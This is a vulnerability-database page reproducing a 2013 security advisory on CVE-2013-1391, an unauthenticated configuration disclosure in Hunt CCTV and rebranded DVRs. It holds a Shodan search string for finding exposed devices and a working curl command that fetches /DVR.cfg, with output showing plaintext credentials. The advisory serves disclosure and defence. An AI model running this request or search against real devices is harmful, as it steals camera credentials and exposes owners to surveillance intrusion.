Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAlejandro RamosPACKETSTORM:119871
HistoryJan 28, 2013 - 12:00 a.m.

Hunt CCTV Credential Disclosure

2013-01-2800:00:00
Alejandro Ramos
packetstormsecurity.com
71

0.971 High

EPSS

Percentile

99.8%

JSON
`Hunt CCTV (and generics brands) Insufficient Authentication  
January 17, 2013 - A. Ramos <aramosf @ gmail . com>  
  
-- CVE ID:  
CVE-2013-1391 [reserved]  
  
-- Affected Vendors:  
Hunt CCTV (http://www.huntcctv.com/)  
** generic brands from Hunt **  
Capture CCTV (http://www.capturecctv.ca/)  
NoVus CCTV (http://www.novuscctv.com/)  
Well-Vision Inc (http://well-vision.com/)  
  
-- Affected Models:  
DVR-04 / DVR-04CH (HuntCCTV)  
DVR-04NC (HuntCCTV)  
DVR-08 / DVR-08CH (HuntCCTV)  
DVR-08NC (HuntCCTV)  
DVR-16 / DVR-16CH (HuntCCTV)  
CDR 0410VE (CaptureCCTV-HuntCCTV)  
CDR 0820VDE (CaptureCCTV-HuntCCTV)  
DR6-704A4H (HuntCCTV)  
DR6-708A4H (HuntCCTV)  
DR6-7316A4H (HuntCCTV)  
DR6-7316A4HL (HuntCCTV)  
HDR-04KD (unknown-HuntCCTV)  
HDR-08KD (unknown-HuntCCTV)  
HV-04RD PRO (Hachi-HuntCCTV)  
HV-08RD PRO (Hachi-HuntCCTV)  
NV-DVR1204 (NovusSec)  
NV-DVR1208 (NovusSec)  
NV-DVR1216 (NovusSec)  
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)  
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)  
  
Shodan dork: Basic realm="DVR" server: httpd -mini  
Shodan results: 46890  
Vulnerable: >70%  
  
-- Vulnerability Details:  
You can get the entire backup config with simple GET. No authentication  
required.  
All information are in clear text: admin panel, ddns config, ppoe  
credentials, misc.  
  
Example:  
  
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i  
USER  
* Trying x.x.x.x... connected  
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)  
> GET /DVR.cfg HTTP/1.1  
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/  
3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2  
> Host: x.x.x.x  
> Accept: */*  
>  
< HTTP/1.0 200 Ok  
< Server: httpd  
< Date: Fri, 17 Jan 2013 05:47:02 GMT  
< Cache-Control: no-cache  
< Pragma: no-cache  
< Expires: 0  
< Connection: close  
< Content-Type: application/octet-stream  
<  
USER1_USERNAME=iam  
USER1_PASSWORD=sexy  
  
Vulnerable firmware (127 different ones):  
- 1.1.10 to 1.1.92  
- 1.47 to 1.51  
- 2.0.0 to 2.1.93  
- 3.0.04 to 3.1.92  
  
-- Disclosure Timeline:  
2011-09-?? - Vulnerability discovered  
2012-12-20 - Published in the book "Hacker Epico" (  
http://www.hackerepico.com)  
2013-01-15 - CVE Assigned  
2013-01-20 - Vulnerability reported to vendor  
2013-01-24 - Vulnerability reported to GDT (Spain)  
2013-01-28 - Public disclosure:  
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html  
  
--   
Alejandro Ramos  
www.securitybydefault.com  
`

Related

openvas 1
cvelist 1
nvd 1
cve 1
checkpoint_advisories 1
prion 1
nessus 1
openvas
openvas
Multiple DVR Information Disclosure Vulnerability
2013-02-01 00:00:00
cvelist
cvelist
CVE-2013-1391
2019-10-30 20:36:40
nvd
nvd
CVE-2013-1391
2019-10-30 21:15:11
cve
cve
CVE-2013-1391
2019-10-30 21:15:11
checkpoint_advisories
checkpoint_advisories
Multiple Products DVR Configuration Disclosure (CVE-2013-1391)
2013-10-21 00:00:00
prion
prion
Authentication flaw
2019-10-30 21:15:00
nessus
nessus
Hunt CCTV DVR.cfg Direct Request Information Disclosure
2013-02-06 00:00:00

0.971 High

EPSS

Percentile

99.8%

JSON
Related for PACKETSTORM:119871
openvas1cvelist1nvd1cve1checkpoint_advisories1prion1nessus1